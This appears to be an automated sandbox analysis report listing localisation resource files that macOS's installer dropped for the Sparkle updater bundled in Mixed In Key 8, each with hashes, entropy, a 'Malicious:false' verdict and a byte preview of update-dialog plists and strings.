                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/tr.lproj/.BC.T_jtiGA8
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):12207
                                                                                                    Entropy (8bit):6.711315035140136
                                                                                                    Encrypted:false
                                                                                                    MD5:A14A6EDDFDB7615CEA7A36AC4C97A336
                                                                                                    SHA1:26061B42681B077B4CCEF5F2307CE208E9889F5C
                                                                                                    SHA-256:551F5ADDB661B151741CD630A36BB386A91B920903E7952FE5702E3D274FBD22
                                                                                                    SHA-512:27EDB2AC4CCA44F005D873BAFEE06C4CB853B4BDDA1F91D904A7077807EA596476BA95AB026513A98B9B1E39E519E3AF29AFFCC960964E72F5E89B196315991F
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.=.E.g.h.i.j.k.w..................................................................... .$.'.,.-.2.6.9.B.C.J.O.P.].`.a.b.v.w.{...................................................................................................$.%.&.-.../.D.G.H.J._.}.f.b........................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.........|.............. ...!."[NSClassName...._..SUAutomaticUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.<..4.5.6.7.8.9.:.;...e.h.j.l.s.v.y....>.?.@.....B.C.DXNSSource]NSDestinationWNSLabel.....c.d....F.G.H.I.J.K.L.M.N.O...P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].]._.`.a.b.c.d.W.f\NSWindowRect_..N
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/tr.lproj/.BC.T_l9nSYK
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):18422
                                                                                                    Entropy (8bit):6.786972546950251
                                                                                                    Encrypted:false
                                                                                                    MD5:A5A18EB894DE3B274BAC0C114E00275A
                                                                                                    SHA1:B947C6D1EF914C575F6A2D998E5F2930FE0F1589
                                                                                                    SHA-256:C6ED82E890B65FFF170183DA954AEF0ED593C1F82ABA5673A2A0F6505ADC562E
                                                                                                    SHA-512:75EDBB08D469F88B54348A35F32EC61A74BC484332C67111378FB7447D1AD9518A7A0AD59668149BDD2A0B2E18A1F30AF956FCE1547DC7F9C6210ABD21D249A9
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top................#.$.*...2.E.M.a.j.k.{.|.......................................................................7.=.M.Q.z.{...........................................................................%.&.+.-.0.9.:.A.B.C.D.G.H.M.N.S.s.t.u.v...................................................................................%.+.,.-.0.3.6.7.9.:.;.<.=.@.A.F.G.K.P.Q.V.W.c.d.e.f.m.n.o.r.v.}...........................................x.`.........................................=.p._...e..............................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys............................ ...!."[NSClassName...._..SUUpdatePermissionPrompt..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObjec
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/tr.lproj/.BC.T_qD4AZ7
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):15840
                                                                                                    Entropy (8bit):6.799193385517934
                                                                                                    Encrypted:false
                                                                                                    MD5:25AE417E6223944444A25144FF4740A1
                                                                                                    SHA1:4E838DF7C114D571AC9F70E0CBB1AA78D9567872
                                                                                                    SHA-256:39A05E6F061F508BF3302AC7D88D5FEA3A15E123BBC611ABB75286A9E4CA64BA
                                                                                                    SHA-512:E1496F1B4826160DCED369EBD6DB049FB6A18FA5DAC39C9CCBCD4E74E5EB5807E1F3BCB0330E7EF33BB5510B186D5C73206ECA5C693E37FDDDD53D685E3839C2
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top................#.$.*...2.G.O.c.l.m.}.~.....................................................................#.&.'./.0.1.2.7.L.S.f.g.h.i.j.k.l.m.n.o.p.q.r.s.t.u.v...w.x.~.........b.............................................................$.*.+.,./.2.5.?.@.H.L.M.V.W.^._.c.x.|...........................................................................................................".#.$.*.2.3.4.:.B.C.D.J.Q.R.S.Z.[.\.v.y.z.|.....s.a......................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys........................ ...!."[NSClassName....]SUUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/uk.lproj/.BC.T_DOpnRx
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode English text, with very long lines
                                                                                                    Size (bytes):6696
                                                                                                    Entropy (8bit):4.156961851830748
                                                                                                    Encrypted:false
                                                                                                    MD5:2BBB283FC0806301EDAE390A28116EB2
                                                                                                    SHA1:84BE78941B29ADA51DCA8D09F062DB777E6344E6
                                                                                                    SHA-256:64914509A698B22799B06ACE0831B96A1023C3A9695A74308CD5ED4B4ED0FA01
                                                                                                    SHA-512:8A7E9845EDA6702122FC087ADFE84B3DC62782F1D5E94A2A59B34A6AFB488448E47E11D054F813E865EA2D400485AAF21CDD37A9FB2A7A16CC782BCA16158AED
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..".%.1.$.@. .%.2.$.@. .h.a.s. .b.e.e.n. .d.o.w.n.l.o.a.d.e.d. .a.n.d. .i.s. .r.e.a.d.y. .t.o. .u.s.e.!. .W.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .i.n.s.t.a.l.l. .i.t. .a.n.d. .r.e.l.a.u.n.c.h. .%.1.$.@. .n.o.w.?.". .=. .".%.1.$.@. .%.2.$.@. .7.0.2.0.=.B.0.6.5.=.8.9. .V. .3.>.B.>.2.8.9. .4.>. .2.8.:.>.@.8.A.B.0.=.=.O.!. ...0.6.0.T.B.5. .2.A.B.0.=.>.2.8.B.8. .V. .?.5.@.5.7.0.2.0.=.B.0.6.8.B.8. .%.1.$.@.?.".;.....".%.1.$.@. .c.a.n.'.t. .b.e. .u.p.d.a.t.e.d. .w.h.e.n. .i.t.'.s. .r.u.n.n.i.n.g. .f.r.o.m. .a. .r.e.a.d.-.o.n.l.y. .v.o.l.u.m.e. .l.i.k.e. .a. .d.i.s.k. .i.m.a.g.e. .o.r. .a.n. .o.p.t.i.c.a.l. .d.r.i.v.e... .M.o.v.e. .%.1.$.@. .t.o. .y.o.u.r. .A.p.p.l.i.c.a.t.i.o.n.s. .f.o.l.d.e.r.,. .r.e.l.a.u.n.c.h. .i.t. .f.r.o.m. .t.h.e.r.e.,. .a.n.d. .t.r.y. .a.g.a.i.n...". .=. ."...V.4. .G.0.A. .@.>.1.>.B.8. .7. .%.1.$.@. .7. .B.>.<.C.,. .I.>. .?.@.8.7.=.0.G.5.=.8.9. .;.8.H.5. .4.;.O. .G.8.B.0.=.=.O.,. .=.0.?.@.8.:.;.0.4.,. .>.1.@.0.7.C. .4.8.A.:.0. .G.8. .>.?.B.8.G.=.>.3.>. .4.8.A.:.C.,. .9.>.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/uk.lproj/.BC.T_SS6HOR
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):15777
                                                                                                    Entropy (8bit):6.8275533906079975
                                                                                                    Encrypted:false
                                                                                                    MD5:267BD8F900950864CCCA7F2CA744BB33
                                                                                                    SHA1:22064BB3E45EE1B1C92B8FEEBFA021F59552A532
                                                                                                    SHA-256:CED05EB0C0D7D32F89D203F4CCA3777D280F02814AA6CBE259EA58E214D112E4
                                                                                                    SHA-512:CE5EA70855F4D5D623F56A088C4E132D9B162D96313E8DDC4A1A9DFF6A4EB2A9F24E3E9E08359441067F282AAE453B25E437149C1C98DA9310136A7E013DFA28
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.G.O.c.l.m.}.~.....................................................................#.&.'./.0.1.2.7.L.S.f.g.h.i.j.k.l.m.n.o.p.q.r.s.t.u.v...w.x.~.....................................................................".%.(.1.2.:.>.?.H.I.P.Q.U.j.n.r.s.u.v.w.}.......................................................................................................%.&.'.-.5.6.7.=.D.E.F.M.N.O.i.l.m.o.....e.a......................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys........................ ...!."[NSClassName....]SUUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.F....4.5.6.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/uk.lproj/.BC.T_UNIwZg
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):12261
                                                                                                    Entropy (8bit):6.743604346491405
                                                                                                    Encrypted:false
                                                                                                    MD5:0A368C803427A64574DE3A995E9B97C1
                                                                                                    SHA1:7FA3ABCE070182C06F3473810EF694D7DE42AEDE
                                                                                                    SHA-256:5D28E8A12891DC67C7BA723383756CB3DE21714E29F3CE06496D9A882519A367
                                                                                                    SHA-512:EFF83ECE9CA9399C5B44D91AFCB200DA8BAFD04FBE04DD199AA0E82D6FC0CE0B364D27A878194350555BE5437975C96DBE963A90F0FCE3854BC7D742A8525134
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.=.E.g.h.i.j.k.w..................................................................... .$.'.,.-.2.6.9.B.C.J.O.P.].`.a.b.v.w.{...................................................................................................$.%.&.-.../.D.G.H.J._.}.f.b........................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.........|.............. ...!."[NSClassName...._..SUAutomaticUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.<..4.5.6.7.8.9.:.;...e.h.j.l.s.v.y....>.?.@.....B.C.DXNSSource]NSDestinationWNSLabel.....c.d....F.G.H.I.J.K.L.M.N.O...P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].]._.`.a.b.c.d.W.f\NSWindowRect_..N
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/uk.lproj/.BC.T_q87fVS
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):18521
                                                                                                    Entropy (8bit):6.8396235299837
                                                                                                    Encrypted:false
                                                                                                    MD5:D9D94113814AC642C8BC65ADC5945180
                                                                                                    SHA1:72EDD864BE94BF5C70998E4C919C630BA2A702D7
                                                                                                    SHA-256:1E506BA76C40D257F50200982494E59C38E130C6023150654386E54B95F7F40F
                                                                                                    SHA-512:E7D6E191014438363E443EAF413BA7059E95846352F9D65474D425003C325E8335215DA182FD4224EDCAAD5B642F8034199F48AE1AB46ED4D6D354310AFB7201
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top................#.$.*...2.E.M.a.j.k.{.|.......................................................................7.=.M.Q.z.{...........................................................................%.&.+.-.0.9.:.A.B.C.D.G.H.M.N.S.s.t.u.v...................................................................................%.+.,.-.0.3.6.7.9.:.;.<.=.@.A.F.G.K.P.Q.V.W.c.d.e.f.m.n.o.r.v.}...............................................x.`.........................................A.t._...e..............................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys............................ ...!."[NSClassName...._..SUUpdatePermissionPrompt..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSO
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/zh_CN.lproj/.BC.T_IdHd0v
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):15683
                                                                                                    Entropy (8bit):6.828224478775802
                                                                                                    Encrypted:false
                                                                                                    MD5:4BF917DB00700E3B89AA3C42C33E5727
                                                                                                    SHA1:499E58FED8DCAC8046C10A16034DBF2202974907
                                                                                                    SHA-256:FAF670438FE64A197A492E8A0083B38F1D9B75A808B9C08B36B8F15CB8A82107
                                                                                                    SHA-512:457564A643A2D2BA77F7271C0A9FF72E1D281D37D086A93EF2D3BA5161F9373E7634E8056E9C78720AFC7639219D989C1A5330AE5B9A11738AB19F7ADF3FDA5C
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top................#.$.*...2.G.O.c.l.m.}.~.....................................................................#.&.'./.0.1.2.7.L.S.f.g.h.i.j.k.l.m.n.o.p.q.r.s.t.u.v...w.x.~.........b.............................................................$.*.+.,./.2.5.>.?.G.K.L.U.V.].^.b.w.{...........................................................................................................".#.$.*.2.3.4.:.B.C.D.J.Q.R.S.Z.[.\.v.y.z.|.....r.a......................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys........................ ...!."[NSClassName....]SUUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/zh_CN.lproj/.BC.T_hbpwJT
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):18081
                                                                                                    Entropy (8bit):6.8597814226576945
                                                                                                    Encrypted:false
                                                                                                    MD5:FC6625F0895C35FEBB097F44E338471C
                                                                                                    SHA1:DE1D3EA2EE3968D12E00A58AA23598F068C46733
                                                                                                    SHA-256:52C190CA3C9A9293044AF4A1B8680318BE117C9F3377C7CC0ED8029864D35674
                                                                                                    SHA-512:EC5503C36B21A98C6BC2F46BC1F982483E7CA911848456FA8E2C7DE49908CE8D4E29A6770A6A024F3FF0BAD8C093D8E5300598A6216017DAB221CE28BBA0FFBD
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top................#.$.*...2.E.M.a.j.k.{.|.......................................................................7.=.M.Q.z.{...........................................................................%.&.+.-.0.9.:.A.B.C.D.G.H.M.N.S.s.t.u.v...................................................................................%.+.,.-.0.3.6.7.9.:.;.<.=.@.A.F.G.K.P.Q.V.W.c.d.e.f.m.n.o.r.v.}...............................................x.`.........................................A.t._...e..............................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys............................ ...!."[NSClassName...._..SUUpdatePermissionPrompt..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSO
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/zh_CN.lproj/.BC.T_nYQEd1
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode English text
                                                                                                    Size (bytes):4960
                                                                                                    Entropy (8bit):4.279054699252902
                                                                                                    Encrypted:false
                                                                                                    MD5:19016389BC9F2CD2B3F0574523670938
                                                                                                    SHA1:C1228934896B06715C54F8C972D4B2F401E92255
                                                                                                    SHA-256:8C3CA2E82E512D6AE392DBCB83450FFD488F627C805DFFA63619DF812BFA475B
                                                                                                    SHA-512:C19362CF648FCE92384D720C44D0DDF7277A82F832E140FA35289754C3D633268EA75744B5A790D0F7FD4A0F5CE5B1E270E0B52EBEA6BE641EF160E73B962BCC
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..".%.1.$.@. .%.2.$.@. .h.a.s. .b.e.e.n. .d.o.w.n.l.o.a.d.e.d. .a.n.d. .i.s. .r.e.a.d.y. .t.o. .u.s.e.!. .W.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .i.n.s.t.a.l.l. .i.t. .a.n.d. .r.e.l.a.u.n.c.h. .%.1.$.@. .n.o.w.?.". .=. .".%.1.$.@. .%.2.$.@. ..].N}..[.kv^.S.N.O(u...`.`...s(W.[.. .%.1.$.@. ..T?.".;.....".%.1.$.@. .c.a.n.'.t. .b.e. .u.p.d.a.t.e.d. .w.h.e.n. .i.t.'.s. .r.u.n.n.i.n.g. .f.r.o.m. .a. .r.e.a.d.-.o.n.l.y. .v.o.l.u.m.e. .l.i.k.e. .a. .d.i.s.k. .i.m.a.g.e. .o.r. .a.n. .o.p.t.i.c.a.l. .d.r.i.v.e... .M.o.v.e. .%.1.$.@. .t.o. .y.o.u.r. .A.p.p.l.i.c.a.t.i.o.n.s. .f.o.l.d.e.r.,. .r.e.l.a.u.n.c.h. .i.t. .f.r.o.m. .t.h.e.r.e.,. .a.n.d. .t.r.y. .a.g.a.i.n...". .=. .".%.1.$.@. ..N.....f.e..S_.[..L..N.N*N.S..'`.[wS.Y.x.v f.P.0o..vI{.Nb..e.0.y.R .%.1.$.@. .0R.^(u.z.^.e.N9Yv^.Q...N!k.0".;.....".%.@. .%.@. .i.s. .c.u.r.r.e.n.t.l.y. .t.h.e. .n.e.w.e.s.t. .v.e.r.s.i.o.n. .a.v.a.i.l.a.b.l.e...". .=. .".%.1.$.@. .%.2.$.@. ./fS_MR.v.g.eHr,g.0".;.....".%.@. .%.@. .i.s. .n.o.w. .a.v.a.i.l.a.b.l.e.-.-.y.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/zh_CN.lproj/.BC.T_yLx5tV
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):12089
                                                                                                    Entropy (8bit):6.760614339122031
                                                                                                    Encrypted:false
                                                                                                    MD5:04BA5493C37FC55E70FA160925069B62
                                                                                                    SHA1:773F3E4AEF8ADE9D6472C19BE50BE9577C7E16B9
                                                                                                    SHA-256:16E4BBAF5119C65E49466488A366AE252CC3BDB593215ECC4A8D56580E69483C
                                                                                                    SHA-512:F4C6452D5408E61953EAC6DD2B156F7EB615E3031F6E3621E2BCC20EF044F1B09A3E956816B89B2027A7E2938896408712FEEEB21B5D7B91C60E484E623A6042
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.=.E.g.h.i.j.k.w..................................................................... .$.'.,.-.2.6.9.B.C.J.O.P.].`.a.b.v.w.{................................................................................................... .!.(.).*.1.2.3.H.K.L.N.c...f.b........................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.........~.............. ...!."[NSClassName...._..SUAutomaticUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.<..4.5.6.7.8.9.:.;...g.j.l.n.u.x.{....>.?.@.....B.C.DXNSSource]NSDestinationWNSLabel.....e.f....F.G.H.I.J.K.L.M.N.O...P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].]._.`.a.b.c.d.W.f\NSWindowRect
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/zh_TW.lproj/.BC.T_1X4LKC
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):15326
                                                                                                    Entropy (8bit):6.828340045990188
                                                                                                    Encrypted:false
                                                                                                    MD5:592AA89A22DA5CE0B4FC4DECDBCF1F1D
                                                                                                    SHA1:E591FED0506282EC05530A680C138C8B21999B2F
                                                                                                    SHA-256:FE7044ADBF9F8C6D3B6CE3F21CD06A676E90A782F9A100544F5F0F9EA472CE63
                                                                                                    SHA-512:74351C50A42CD3AB3F15495969BB51E33A0982BEE512B07FFF9F4C4DBC0CDD2AFB686829BD2886B7D55FAE87094B4DE286530B24A4E78FCAD3EDCF8E0F38BC59
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.E.M.a.j.k.{.|.....................................................................+.2.E.F.G.H.I.J.K.L.M.N.O.P.Q.R.S.T.U...V.W.].b.f.j.m.n.s................................................................... .#.$.,.-...:.=.>.F.G.H.].a.e.f.h.i.j.p.u.v.{.........................................................................................................'.(.)./.6.7.8.?.@.A.[.^._.a.{...X._..................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys........................ ...!."[NSClassName....]SUUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.D....4.5.6.7.8.9.:.;.<.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/zh_TW.lproj/.BC.T_3KjTkj
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode English text
                                                                                                    Size (bytes):4694
                                                                                                    Entropy (8bit):4.358426012806943
                                                                                                    Encrypted:false
                                                                                                    MD5:6E9B194285CA2C3B4B073E71F042F363
                                                                                                    SHA1:6E4C08CF83812B0B6692EDA109D8C40B7854098A
                                                                                                    SHA-256:494094315197DDE9A23EEE12F9556C05ED24BD82BD30323D08D807D712B8267C
                                                                                                    SHA-512:31993427620D3D3E484E7DCE061FFE6048C5C0812EFBB0D793017F9E5D10380B9D5FA18E90F9C53D8B0CA6CE56BCB09DC035BF87F8F541E174AC666175782CE4
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..".%.1.$.@. .%.2.$.@. .h.a.s. .b.e.e.n. .d.o.w.n.l.o.a.d.e.d. .a.n.d. .i.s. .r.e.a.d.y. .t.o. .u.s.e.!. .W.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .i.n.s.t.a.l.l. .i.t. .a.n.d. .r.e.l.a.u.n.c.h. .%.1.$.@. .n.o.w.?.". .=. .".%.1.$.@. .%.2.$.@. ..].N...N.S.O.O(u...`/f&T...s(W.[..&N...e_U.R%.1.$.@...".;.....".%.1.$.@. .c.a.n.'.t. .b.e. .u.p.d.a.t.e.d. .w.h.e.n. .i.t.'.s. .r.u.n.n.i.n.g. .f.r.o.m. .a. .r.e.a.d.-.o.n.l.y. .v.o.l.u.m.e. .l.i.k.e. .a. .d.i.s.k. .i.m.a.g.e. .o.r. .a.n. .o.p.t.i.c.a.l. .d.r.i.v.e... .M.o.v.e. .%.1.$.@. .t.o. .y.o.u.r. .A.p.p.l.i.c.a.t.i.o.n.s. .f.o.l.d.e.r.,. .r.e.l.a.u.n.c.h. .i.t. .f.r.o.m. .t.h.e.r.e.,. .a.n.d. .t.r.y. .a.g.a.i.n...". .=. .".vu .%.1.$.@. .ck._/U..wS.[...Y.x.x f.P.j.bIQ.x_j...WL.Bf..!q.l2.L..f.e.0...\ .%.1.$.@. ..y...`.v. .a(u.z._. .jHh>Y..._r.U....e_U.R..6q._.Qf..N!k.0 . .".;.....".%.@. .%.@. .i.s. .c.u.r.r.e.n.t.l.y. .t.h.e. .n.e.w.e.s.t. .v.e.r.s.i.o.n. .a.v.a.i.l.a.b.l.e...". .=. .".%.1.$.@. .%.2.$.@. ..]/f.vMR.g.e.vHr,g.0".;.....".%.@. .%.@. .
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/zh_TW.lproj/.BC.T_MmMoXX
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):18080
                                                                                                    Entropy (8bit):6.866512672599806
                                                                                                    Encrypted:false
                                                                                                    MD5:5E2245B64645FD941CD3CC5DFEA72BBE
                                                                                                    SHA1:BF6167784C2272E773CC8E02D6F7177AEE5975F2
                                                                                                    SHA-256:E7E52979E42295CF4480A3FEECE4BC8CBBDC8C375EE21DEA26A8ADB9E46F66FD
